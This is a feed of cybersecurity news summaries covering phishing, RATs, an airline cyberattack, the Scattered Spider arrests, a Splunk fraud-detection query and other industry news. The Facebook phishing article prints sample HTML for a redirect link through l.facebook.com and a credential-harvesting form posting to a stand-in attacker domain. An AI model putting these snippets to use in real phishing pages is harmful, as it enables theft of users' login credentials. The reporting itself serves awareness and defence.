• A newly discovered video injection tool for iOS devices that have been jailbroken poses a serious threat to modern digital identity verification. Developed to run on iOS 15 or later, this highly specialized toolkit can circumvent weak biometric checks and even exploit services lacking any biometric safeguards. Its emergence marks a troubling shift toward automated, […]

    The post New iOS Video Injection Tool Bypasses Biometric Locks on Jailbroken iPhones appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Remote Monitoring and Management tools such as ConnectWise ScreenConnect have earned a reputation for simplifying IT administration, but they have also drawn the attention of sophisticated attackers. By abusing ScreenConnect’s trusted installation footprint and deep system privileges, adversaries are now trojanizing installers to deploy dual Remote Access Trojans (RATs)—AsyncRAT and a custom PowerShell RAT—against U.S. […]

    The post Weaponized ScreenConnect App Spreads AsyncRAT and PowerShell RAT appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated phishing campaign has recently emerged, targeting Facebook users with carefully crafted emails designed to harvest login credentials.

    Attackers leverage the platform’s own external URL warning system to cloak malicious links, presenting URLs that appear legitimate while redirecting victims to counterfeit Facebook login pages.

    The initial lure arrives as an urgent security notification, warning users of “unauthorized access attempts” or prompting them to verify account activity.

    The email’s design closely mirrors Facebook’s styling, complete with social media icons and footer disclaimers, creating a sense of authenticity and leading recipients to click without hesitation.

    Phishing (Source – X)

    The campaign’s reach spans multiple languages, including English, German, Spanish, and Korean, broadening its potential victim pool.

    Phishing URLs consistently follow a pattern of benign domains forwarded through Facebook’s redirector service (e.g., httpst.co/MS24b2xu6p), which then reroute to attackers’ infrastructure.

    SpiderLabs analysts identified this technique after examining dozens of email samples, noting how the redirect mechanism both evades link scanners and bypasses user suspicion.

    Victims who follow the link encounter a near-perfect replica of Facebook’s login interface, where credentials submitted are immediately exfiltrated to a command-and-control server.

    On successful submission, the fake portal executes a brief JavaScript snippet to display an “Incorrect password” error, prompting users to re-enter their details—unwittingly supplying attackers with valid credentials on the second attempt.

    The harvested data includes email addresses, phone numbers, and passwords, which are stored in a PHP backend script for later retrieval by threat actors.

    Redirect-Based Infection Mechanism

    The core innovation of this phishing campaign lies in its abuse of Facebook’s external URL warning system as an infection mechanism.

    Rather than linking directly to malicious domains, attackers construct a URL of the form:-

    <a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fataloraxmalicious.co%2Ffb.php&h=AT0Xyz…">
      Verify Your Account
    </a>

    This link leverages Facebook’s l.facebook.com redirect service, embedding the actual phishing site in the u= parameter.

    When clicked, Facebook presents a warning banner but ultimately forwards the victim to the malicious page, lending credibility to the destination.

    Once on the phishing site, the HTML form collects credentials via:-

    <form action="https://ataloraxmalicious.co/fb.php" method="POST">
      <input type="text" name="email" autocomplete="username"/>
      <input type="password" name="pass" autocomplete="current-password"/>
      <button type="submit">Log In</button>
    </form>

    Upon submission, a JavaScript routine triggers a second redirect back to Facebook, displaying an error notice to the user and minimizing suspicion.

    This redirect-based infection mechanism not only bypasses email security gateways but also exploits user trust in Facebook’s domain, making detection and prevention significantly more challenging.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post New Phishing Attack Targets Facebook Users to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Krasnoyarsk Regional Airlines (KrasAvia) confirmed a sophisticated cyberattack that has rendered its primary online services inoperable. 

    The breach targeted the airline’s web portal and associated back-end systems, including the Passenger Service System (PSS) and flight planning applications. 

    As a result, passengers are currently unable to complete e-ticket purchases or check in online, prompting KrasAvia to revert to manual processes for flight assignments, crew scheduling, and ground handling.

    According to the airline’s press service, the incident was first detected at approximately 08:00 MSK, when automated alerts from the network intrusion detection system (IDS) indicated anomalous traffic patterns consistent with a distributed denial-of-service (DDoS) attack combined with unauthorized access attempts. 

    Subsequent analysis revealed malicious payloads, possibly leveraging a zero-day exploit to bypass perimeter firewalls and deploy a custom malware strain within the corporate network. 

    KrasAvia immediately activated its incident response plan, isolating affected servers and engaging an external digital forensics team to conduct a root cause analysis.

    Passengers have been advised to contact the airline’s call centers or visit offline ticketing agencies to arrange travel. 

    “We are currently doing everything possible to avoid and minimize the consequences,” stated the airline. 

    “All flights have been switched to manual flight and flight management. Unfortunately, tickets are no longer available online. People are contacting us, and we are redirecting them to offline agencies.”

    KrasAvia Website Down

    With the KrasAvia website down and no clear timeline for restoration, a crisis communication channel via Telegram has emerged as the only interim information source, according to reports.

    The Borus Telegram channel initially published a screenshot of the compromised homepage before it was promptly removed. 

    Compromised Homepage
    Compromised Homepage

    KrasAvia has declined to comment on the extent of data exfiltration but confirmed that an internal audit is in progress, coordinated with Russia’s Federal Service for Supervision of Communications (Roskomnadzor) and the National Computer Incident Response Team (CERT-RU).

    This incident bears striking similarities to the high-profile attack on Aeroflot earlier this summer, which exploited vulnerabilities in third-party software to disrupt flight operations and ground control systems. 

    In that case, Aeroflot’s security operations center (SOC) detected lateral movement by threat actors using remote access trojans (RATs) before containing the breach. 

    Industry experts warn that airlines remain a prime target due to their reliance on interconnected IT and operational technology (OT) systems, often with outdated infrastructure that lacks robust security controls, such as multi-factor authentication (MFA) and real-time endpoint detection and response (EDR).

    KrasAvia assures passengers that safety remains uncompromised and that flight crews continue standard operating procedures (SOPs) for secure communications. 

    Updates regarding system recovery and ticketing resumption will be posted on the airline’s social media accounts and official press releases. 

    As the investigation continues, the broader aviation sector watches closely, recognizing that enhanced threat intelligence sharing and hardened cybersecurity defenses are critical to mitigating future disruptions.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Russian Airline Suffered Cyberattack Website and Other Systems Affected appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • UK law enforcement has arrested two individuals linked to the notorious Scattered Spider cybercriminal group, including 19-year-old Thalha Jubair from London, who faces charges in connection with over 120 network intrusions that resulted in more than $115 million in ransom payments. 

    The arrests represent a significant breakthrough in dismantling one of the world’s most prolific ransomware operations, which targeted critical infrastructure, including the London Transport system.

    “Scattered Spider” Hackers Charged

    The coordinated operation involved multiple international agencies, with the FBI’s Cyber Division, the UK’s National Crime Agency, the City of London Police, and the West Midlands Police working together to track down the cybercriminals. 

    Jubair, operating under aliases including “EarthtoStar,” “Brad,” “Austin,” and “@autistic,” was charged with computer fraud conspiracy, wire fraud conspiracy, and money laundering conspiracy in a complaint filed in the District of New Jersey.

    The investigation revealed that Scattered Spider, also known as “Octo Tempest,” “UNC3944,” and “0ktapus,” employed sophisticated social engineering techniques to infiltrate corporate networks. 

    The group’s modus operandi included voice phishing attacks against help desks, SIM swapping operations, and spear phishing campaigns to gain unauthorized access to victim systems.

    The cybercriminal operation spanned from May 2022 to September 2025, with attackers utilizing advanced persistence mechanisms and lateral movement techniques within compromised networks. 

    Law enforcement successfully seized cryptocurrency worth approximately $36 million from servers controlled by Jubair, though he managed to transfer an additional $8.4 million in cryptocurrency to alternative wallets during the seizure operation.

    The group’s targeting of critical infrastructure included successful breaches of the U.S. Courts system and a U.S.-based critical infrastructure company in October 2024 and January 2025. 

    The London Transport system breach demonstrates the group’s capability to compromise SCADA systems and operational technology networks that control essential public services.

    Assistant Deputy Chief Adrienne L. Rose from the Justice Department’s Computer Crime and Intellectual Property Section (CCIPS) emphasized that since 2020, CCIPS has secured convictions of over 180 cybercriminals and facilitated the return of more than $350 million in victim funds. 

    If convicted on all charges, Jubair faces a maximum penalty of 95 years in prison, highlighting the severe consequences for ransomware-as-a-service operators and their affiliates.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post UK Arrested 2 Scattered Spider Hackers Linked to London Transport System Breach appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Detecting remote employment fraud has become a critical priority for organizations striving to secure their digital onboarding processes and safeguard sensitive systems.

    In recent months, threat actors posing as legitimate hires have leveraged sophisticated tactics to bypass pre-hire screenings and embed themselves within corporate networks.

    This emerging threat vector, known as Remote Employment Fraud (REF), exploits gaps between human resources workflows and security monitoring, allowing malicious insiders to gain persistent access and exfiltrate data under the cover of a legitimate employee identity.

    The initial stages of REF involve threat actors meticulously crafting resumes, passing background checks, and scheduling interviews that appear indistinguishable from genuine candidates.

    Once onboarded, they request shipment of corporate assets—laptops, mobile devices, or network tokens—to addresses that often diverge from their purported locations.

    Through careful correlation of asset management logs with applicant tracking data, organizations can reveal discrepancies that point to fraudulent activity.

    Splunk analysts identified the first wave of these anomalies by matching ServiceNow shipment records against Workday employee profiles, flagging cases where the delivered location did not align with an employee’s registered home state.

    Location did not align with an employee’s registered home state (Source – Splunk)

    Splunk analysts noted that REF actors frequently leverage nonstandard VPN services to obfuscate their true IP addresses and geolocations.

    While virtual private networks are commonplace for legitimate remote work, inconsistencies between expected corporate VPN endpoints and unusual third-party VPN providers serve as strong indicators of fraud.

    By creating baselines in Identity Provider (IdP) logs—such as Okta or Duo—security teams can detect anomalous VPN sessions and enforce network zones that block unauthorized anonymizer services.

    Beyond transport-layer evasion, REF actors may employ improbable travel tactics to mask their origin.

    Login attempts from geographically distant locations within implausible timeframes—such as a login from London minutes after a session in New York—underscore the need for geospatial analytics.

    Splunk Enterprise Security’s Authentication Data Model can calculate approximate travel speed between login events to surface these anomalies, enabling rapid investigation before a breach escalates.

    Infection Mechanism and Persistence Through Asset Misshipment

    An in-depth look at the most prevalent REF infection mechanism reveals how initial device shipment inconsistencies provide the foothold for continued access.

    Threat actors request corporate laptops to be sent to alternate locations, often invoking urgent personal circumstances to justify mismatches.

    Once the device arrives, embedded persistence tactics—such as installing unsanctioned remote access tools—ensure ongoing connectivity.

    Security teams can prevent these operations by correlating applicant tracking system (ATS) data with IT asset logs in Splunk.

    index=servicenow sourcetype=laptop_shipment
    | eval delivered_location=case(arrivalState="CA","California", arrivalState="TX","Texas")
    | join type=outer Email [search index=identity sourcetype=workday_employee]
    | eval Suspicious=if(delivered_location!=home_state,"Yes","No")
    | search Suspicious="Yes"
    | table name, employeeId, home_state, delivered_location, Email
    Inconsistent worker locations (Source – Splunk)

    By automating this detection query, organizations can immediately surface potential REF cases, prompting joint investigations by security and HR teams.

    Integrating these detections into a Risk-Based Alerting (RBA) framework further enhances visibility, enabling prioritized incident response workflows that minimize false positives and drive efficient mitigation.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Splunk Releases Guide to Detect Remote Employment Fraud Within Your Organization appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Law enforcement authorities in the U.K. have arrested two teen members of the Scattered Spider hacking group in connection with their alleged participation in an August 2024 cyber attack targeting Transport for London (TfL), the city’s public transportation agency. Thalha Jubair (aka EarthtoStar, Brad, Austin, and @autistic), 19, from East London and Owen Flowers, 18, from Walsall, West Midlands

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In a groundbreaking analysis, cybersecurity firm KELA reveals striking parallels in operational style, target selection, and online presence that suggest a possible connection between two Yemen-linked threat actors: the recently surfaced Belsen Group and the long-standing ZeroSevenGroup. Who Is the Belsen Group? The Belsen Group made its debut in early January 2025 via a post […]

    The post Researchers Reveal Connection Between Belsen and ZeroSeven Cybercrime Groups appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cloudflare experienced a significant outage on September 12, 2025, affecting its Tenant Service API, multiple APIs, and the Cloudflare Dashboard. The company has confirmed that the incident was primarily triggered by a React programming bug that caused excessive API calls, overwhelming critical infrastructure components. Technical Root Cause Identified The outage originated from a coding error […]

    The post Cloudflare Confirms API Outage Caused by React useEffect Overload Issue appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft has announced a significant upgrade to Windows 11 Notepad, introducing powerful artificial intelligence features that will revolutionize how users create and edit text. The update brings AI-powered writing assistance directly to the classic text editor, offering capabilities previously available only in premium applications. Windows 11 Notepad now features AI-powered options like write, rewrite, and summarize accessible […]

    The post Windows 11 Notepad to Receive AI Upgrade for Free Text Writing and Summarizing appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶